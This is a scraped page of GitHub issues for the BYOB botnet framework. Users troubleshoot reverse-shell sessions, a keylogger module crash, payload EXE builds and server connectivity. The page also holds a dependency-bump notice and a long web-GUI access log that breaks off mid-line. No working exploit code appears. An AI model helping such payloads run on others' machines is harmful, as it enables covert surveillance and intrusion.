    Only one time, in the server, appeared this: [-] Failed Connection: 192.168.1.5 It happens when the Server is still running and I close the CMD window.

    And another issue is this: Quitting server - Keep clients alive? (y/n):y Killed

    I really like this project, so I'm trying to give you all the info and make it better! :)

    opened by hexan86 19
  • Shell

    Shell

    I first thought that I made a mistake when I used the shell command but it seems like my shell is broke. I accessed the shell of my VM and then typed keylogger run then the shell immediately closed.

    [37m[fabian @ C:\Users\fabian\Desktop\byob]>shell 0
    
    
    Starting Reverse TCP Shell w/ Session 0...
    
    [ 0 @ C:\Users\fabi\Downloads ]>help
    
    _Help command output_
    
     [ 0 @ C:\Users\fabi\Downloads ]>pwd
    
    C:\Users\fabi\Downloads
    
    [ 0 @ C:\Users\fabi\Downloads ]>help keylogger
    
       command <arg>                                                      description
     keylogger [mode]
            Log user keystrokes
    
            `Required`
            :param str mode:    run, stop, status, upload
    
    
    
     [ 0 @ C:\Users\fabi\Downloads ]>keylogger run
    Exception in thread 1586902874.7410786:
    Traceback (most recent call last):
      File "C:\Users\fabia\AppData\Local\Programs\Python\Python37\lib\threading.py", line 926, in _bootstrap_inner
        self.run()
      File "C:\Users\fabia\AppData\Local\Programs\Python\Python37\lib\threading.py", line 870, in run
        self._target(*self._args, **self._kwargs)
      File "server.py", line 783, in serve_until_stopped
        info = self.database.handle_session(session.info)
      File "C:\Users\fabia\Desktop\byob\core\database.py", line 231, in handle_session
        buid = str(info['public_ip'] + info['mac_address']).encode()
    KeyError: 'public_ip'
    
    Session 0 disconnected
    [fabian @ C:\Users\fabian\Desktop\byob]>
    
    bug good first issue 
    opened by fabilus11 17
  • connection not answered (but not refused)

    connection not answered (but not refused)

    Please use the Discord Support Server if you need help and reserve creating issues for bug reports.

    Describe the bug Just don't show and aren't connected: urllib.error.URLError: <urlopen error [Errno 110] Connection timed out> server does not answer but firewall opened && portforwarding with 1337-1339 both

    To Reproduce Steps to reproduce the behavior: Just try it out and fail

    Expected behavior

    Screenshots

    Desktop (please complete the following information):

    • OS: Ubuntu 21.04
    • Python version: 3.9

    Additional context Port 5000 not forwarded; Ports on both systems forwarded (iptables:) sudo iptables -A INPUT -p tcp --dport 1337 -j ACCEPT sudo iptables -A OUTPUT -p tcp --dport 1337 -j ACCEPT sudo iptables -A INPUT -p tcp --dport 1338 -j ACCEPT sudo iptables -A OUTPUT -p tcp --dport 1338 -j ACCEPT sudo iptables -A OUTPUT -p tcp --dport 1339 -j ACCEPT sudo iptables -A INPUT -p tcp --dport 1339 -j ACCEPT (they weren't blocked so...)

    It also didn't work past 1 year were I tried to change the ports in the payloads (I just could have change them in the run.py script. Also There the not-web-gui version worked so I assume it is a problem in the code)

    bug no-issue-activity 
    opened by arch-user-france1 16
  • BYOB not creating an EXE

    BYOB not creating an EXE

    I ran every command correctly and when it is finished running client.py with --freeze it says something like this: (16,317,804 bytes saved to file: /DIRECTORY/byob/byob/dist/byob_bai) but for most people it would be byob_bai.exe I tried renaming the file (adding .exe to the end) once I downloaded it to my PC but it says "This app can't run on your PC" and doesn't let me run it. Anyone know why?

    opened by jchernin4 15
  • the procedure entry point could not be located in the dynamic library

    the procedure entry point could not be located in the dynamic library

    when I issue

    run the exe version of the payload there is an error when I run it on windows 10 and apparently its referring to ht eucrtbase.dll in my temp folder and I tried running it as admin but nothing worked and I also tried to use the python version of the payload but its throwing tons of errors when I run the python script. so basically I can not create any payloads can anyone help me

    bug no-issue-activity 
    opened by zarnackwizard 14
  • Bump json5 from 2.1.0 to 2.2.3 in /web-gui/buildyourownbotnet/assets/js/jquery-terminal

    Bump json5 from 2.1.0 to 2.2.3 in /web-gui/buildyourownbotnet/assets/js/jquery-terminal

    Bumps json5 from 2.1.0 to 2.2.3.

    Release notes

    Sourced from json5's releases.

    v2.2.3

    v2.2.2

    • Fix: Properties with the name __proto__ are added to objects and arrays. (#199) This also fixes a prototype pollution vulnerability reported by Jonathan Gregson! (#295).

    v2.2.1

    • Fix: Removed dependence on minimist to patch CVE-2021-44906. (#266)

    v2.2.0

    • New: Accurate and documented TypeScript declarations are now included. There is no need to install @types/json5. (#236, #244)

    v2.1.3 [code, diff]

    • Fix: An out of memory bug when parsing numbers has been fixed. (#228, #229)

    v2.1.2

    • Fix: Bump minimist to v1.2.5. (#222)

    v2.1.1

    • New: package.json and package.json5 include a module property so bundlers like webpack, rollup and parcel can take advantage of the ES Module build. (#208)
    • Fix: stringify outputs \0 as \\x00 when followed by a digit. (#210)
    • Fix: Spelling mistakes have been fixed. (#196)
    Changelog

    Sourced from json5's changelog.

    v2.2.3 [code, diff]

    v2.2.2 [code, diff]

    • Fix: Properties with the name __proto__ are added to objects and arrays. (#199) This also fixes a prototype pollution vulnerability reported by Jonathan Gregson! (#295).

    v2.2.1 [code, diff]

    • Fix: Removed dependence on minimist to patch CVE-2021-44906. (#266)

    v2.2.0 [code, diff]

    • New: Accurate and documented TypeScript declarations are now included. There is no need to install @types/json5. (#236, #244)

    v2.1.3 [code, diff]

    • Fix: An out of memory bug when parsing numbers has been fixed. (#228, #229)

    v2.1.2 [code, diff]

    • Fix: Bump minimist to v1.2.5. (#222)

    v2.1.1 [code, [diff][d2.1.1]]

    ... (truncated)

    Commits
    • c3a7524 2.2.3
    • 94fd06d docs: update CHANGELOG for v2.2.3
    • 3b8cebf docs(security): use GitHub security advisories
    • f0fd9e1 docs: publish a security policy
    • 6a91a05 docs(template): bug -> bug report
    • 14f8cb1 2.2.2
    • 10cc7ca docs: update CHANGELOG for v2.2.2
    • 7774c10 fix: add proto to objects and arrays
    • edde30a Readme: slight tweak to intro
    • 97286f8 Improve example in readme
    • Additional commits viewable in compare view

    Dependabot compatibility score

    Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


    Dependabot commands and options

    You can trigger Dependabot actions by commenting on this PR:

    • @dependabot rebase will rebase this PR
    • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
    • @dependabot merge will merge this PR after your CI passes on it
    • @dependabot squash and merge will squash and merge this PR after your CI passes on it
    • @dependabot cancel merge will cancel a previously requested merge and block automerging
    • @dependabot reopen will reopen this PR if it is closed
    • @dependabot close will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually
    • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
    • @dependabot use these labels will set the current labels as the default for future PRs for this repo and language
    • @dependabot use these reviewers will set the current reviewers as the default for future PRs for this repo and language
    • @dependabot use these assignees will set the current assignees as the default for future PRs for this repo and language
    • @dependabot use this milestone will set the current milestone as the default for future PRs for this repo and language

    You can disable automated security fix PRs for this repo from the Security Alerts page.

    dependencies javascript 
    opened by dependabot[bot] 0
  • Not work

    Not work

    Log INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:34] "GET / HTTP/1.1" 200 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:34] "GET /assets/css/font-icons/entypo/css/entypo.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:34] "GET /assets/js/jquery-ui/css/no-theme/jquery-ui-1.10.3.custom.min.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:34] "GET /assets/css/neon-core.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:34] "GET /assets/css/bootstrap.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:34] "GET /assets/css/neon-forms.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:34] "GET /assets/css/neon-theme.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:34] "GET /assets/css/custom.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:34] "GET /assets/js/jquery-1.11.3.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:34] "GET /assets/js/easy-pie-chart/dist/jquery.easypiechart.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:34] "GET /assets/js/jvectormap/jquery-jvectormap-1.2.2.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:34] "GET /assets/js/rickshaw/rickshaw.min.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:34] "GET /assets/js/jquery-ui/js/jquery-ui-1.10.3.minimal.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:34] "GET /assets/js/gsap/TweenMax.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:34] "GET /assets/js/joinable.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:34] "GET /assets/js/bootstrap.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:34] "GET /assets/js/resizeable.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:34] "GET /assets/js/neon-api.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:34] "GET /assets/js/jvectormap/jquery-jvectormap-1.2.2.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:34] "GET /assets/js/jvectormap/jquery-jvectormap-world-mill-en.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:34] "GET /assets/js/jquery.sparkline.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:34] "GET /assets/js/rickshaw/vendor/d3.v3.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:34] "GET /assets/fonts/Protomolecule-Light.otf HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:34] "GET /assets/css/font-icons/entypo/font/entypo.woff?71205724 HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:34] "GET /assets/fonts/TitilliumWeb-Light.ttf HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:34] "GET /assets/images/byob_logo-12.png HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:34] "GET /assets/images/AdobeStock_239170812.jpg HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:34] "GET /assets/js/rickshaw/rickshaw.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:34] "GET /assets/js/raphael-min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:34] "GET /assets/js/morris.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:34] "GET /assets/js/toastr.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:34] "GET /assets/js/neon-chat.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:35] "GET /assets/js/custom/canvas-init.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:35] "GET /assets/js/neon-demo.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:35] "GET /assets/images/carouselpngs/carousel_developers.png HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:35] "GET /assets/images/carouselpngs/carousel_universities.png HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:35] "GET /assets/js/neon-custom.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:35] "GET /assets/images/carouselpngs/carousel_businesses.png HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:35] "GET /assets/images/previews/preview-dashboard.png HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:35] "GET /assets/images/previews/preview-payloads2.png HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:35] "GET /assets/images/previews/preview-shell.png HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:35] "GET /assets/images/module_lineart/blue_lineart_monero.png HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:35] "GET /assets/images/module_lineart/blue_lineart_persist.png HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:35] "GET /assets/images/module_lineart/blue_lineart_escalate.png HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:35] "GET /assets/images/module_lineart/blue_lineart_keylogger.png HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:35] "GET /assets/images/module_lineart/blue_lineart_portscanner.png HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:35] "GET /assets/images/module_lineart/blue_lineart_webcam.png HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:35] "GET /assets/images/module_lineart/blue_lineart_screenshot.png HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:36] "GET /assets/images/byob_favicon_round-15.png HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:44] "GET /login HTTP/1.1" 403 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:44] "GET /assets/js/jquery-ui/css/no-theme/jquery-ui-1.10.3.custom.min.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:44] "GET /assets/css/font-icons/entypo/css/entypo.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:44] "GET /assets/css/bootstrap.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:44] "GET /assets/css/neon-core.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:44] "GET /assets/css/neon-theme.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:44] "GET /assets/css/neon-forms.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:44] "GET /assets/css/custom.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:44] "GET /assets/js/jquery-1.11.3.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:44] "GET /assets/js/gsap/TweenMax.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:44] "GET /assets/js/jquery-ui/js/jquery-ui-1.10.3.minimal.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:44] "GET /assets/js/joinable.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:44] "GET /assets/js/bootstrap.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:45] "GET /assets/js/resizeable.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:45] "GET /assets/js/neon-api.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:45] "GET /assets/js/jquery.validate.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:45] "GET /assets/js/neon-login.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:45] "GET /assets/css/font-icons/entypo/font/entypo.woff?71205724 HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:45] "GET /assets/js/neon-custom.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:45] "GET /assets/js/custom/canvas-login.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:45] "GET /assets/images/AdobeStock_239170812.jpg HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:45] "GET /assets/js/neon-demo.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:45] "GET /assets/images/byob_logo-12.png HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:45] "GET /assets/images/byob_favicon_round-15.png HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:48] "POST /login HTTP/1.1" 302 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:48] "GET /sessions HTTP/1.1" 200 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:49] "GET /assets/js/jquery-ui/css/no-theme/jquery-ui-1.10.3.custom.min.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:49] "GET /assets/css/font-icons/entypo/css/entypo.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:49] "GET /assets/css/bootstrap.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:49] "GET /assets/css/neon-core.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:49] "GET /assets/css/neon-theme.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:49] "GET /assets/css/neon-forms.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:49] "GET /assets/css/custom.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:49] "GET /assets/js/jquery-1.11.3.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:49] "GET /assets/js/datatables/datatables.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:49] "GET /assets/js/selectboxit/jquery.selectBoxIt.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:49] "GET /assets/js/select2/select2.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:49] "GET /assets/js/gsap/TweenMax.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:49] "GET /assets/js/jquery-ui/js/jquery-ui-1.10.3.minimal.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:49] "GET /assets/css/font-icons/entypo/font/entypo.woff?71205724 HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:49] "GET /assets/fonts/TitilliumWeb-Light.ttf HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:49] "GET /assets/profile_pics/default_profile.jpg HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:49] "GET /assets/js/bootstrap.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:49] "GET /assets/js/joinable.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:49] "GET /assets/js/resizeable.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:49] "GET /assets/js/neon-api.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:49] "GET /assets/js/select2/select2-bootstrap.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:49] "GET /assets/js/select2/select2.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:49] "GET /assets/js/datatables/datatables.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:49] "GET /assets/js/neon-chat.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:49] "GET /assets/js/neon-custom.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:49] "GET /assets/js/daterangepicker/daterangepicker-bs3.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:49] "GET /assets/js/icheck/skins/minimal/_all.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:49] "GET /assets/js/icheck/skins/square/_all.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:49] "GET /assets/images/byob_logo-12.png HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:49] "GET /assets/js/icheck/skins/flat/_all.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:49] "GET /assets/js/icheck/skins/futurico/futurico.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:49] "GET /assets/js/selectboxit/jquery.selectBoxIt.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:49] "GET /assets/js/icheck/skins/polaris/polaris.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:49] "GET /assets/js/bootstrap-tagsinput.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:49] "GET /assets/js/typeahead.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:49] "GET /assets/js/bootstrap-datepicker.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:49] "GET /assets/js/bootstrap-colorpicker.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:49] "GET /assets/js/moment.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:49] "GET /assets/js/jquery.multi-select.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:49] "GET /assets/js/daterangepicker/daterangepicker.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:49] "GET /assets/js/icheck/icheck.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:49] "GET /assets/js/rickshaw/vendor/d3.v3.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:49] "GET /assets/js/rickshaw/rickshaw.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:49] "GET /assets/js/raphael-min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:49] "GET /assets/js/morris.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:50] "GET /assets/js/jquery.peity.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:50] "GET /assets/js/jvectormap/jquery-jvectormap-1.2.2.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:50] "GET /assets/js/rickshaw/rickshaw.min.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:50] "GET /assets/js/jvectormap/jquery-jvectormap-1.2.2.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:50] "GET /assets/js/jvectormap/jquery-jvectormap-world-mill-en.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:50] "GET /assets/js/jquery.sparkline.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:50] "GET /assets/js/toastr.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:50] "GET /assets/js/bootstrap-timepicker.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:50] "GET /assets/js/neon-demo.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:50] "GET /assets/js/custom/canvas-login.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:50] "GET /assets/images/discord.png HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:50] "GET /assets/images/byob_favicon_round-15.png HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:51] "GET /api/session/poll HTTP/1.1" 200 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:51] "GET /api/session/poll HTTP/1.1" 200 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:52] "GET /api/session/poll HTTP/1.1" 200 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:53] "GET /api/session/poll HTTP/1.1" 200 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:54] "GET /payloads HTTP/1.1" 200 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:54] "GET /assets/js/jquery-ui/css/no-theme/jquery-ui-1.10.3.custom.min.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:54] "GET /assets/css/font-icons/entypo/css/entypo.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:54] "GET /assets/css/bootstrap.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:54] "GET /assets/css/neon-theme.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:54] "GET /assets/css/neon-core.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:54] "GET /assets/css/neon-forms.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:54] "GET /assets/css/custom.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:54] "GET /assets/js/jquery-1.11.3.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:54] "GET /assets/js/datatables/datatables.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:54] "GET /assets/js/select2/select2-bootstrap.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:54] "GET /assets/js/select2/select2.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:54] "GET /assets/js/selectboxit/jquery.selectBoxIt.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:54] "GET /assets/js/gsap/TweenMax.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:55] "GET /assets/js/bootstrap.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:55] "GET /assets/js/joinable.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:55] "GET /assets/js/neon-api.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:55] "GET /assets/js/resizeable.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:55] "GET /assets/css/font-icons/entypo/font/entypo.woff?71205724 HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:55] "GET /assets/fonts/TitilliumWeb-Light.ttf HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:55] "GET /assets/profile_pics/default_profile.jpg HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:55] "GET /assets/images/byob_logo-12.png HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:55] "GET /assets/js/datatables/datatables.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:55] "GET /assets/js/select2/select2.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:55] "GET /assets/js/neon-chat.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:55] "GET /assets/js/jquery-ui/js/jquery-ui-1.10.3.minimal.min.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:55] "GET /assets/js/neon-custom.js HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:55] "GET /assets/js/daterangepicker/daterangepicker-bs3.css HTTP/1.1" 304 - INFO:werkzeug:180.246.176.252 - - [30/Dec/2022 08:40:55] "GET 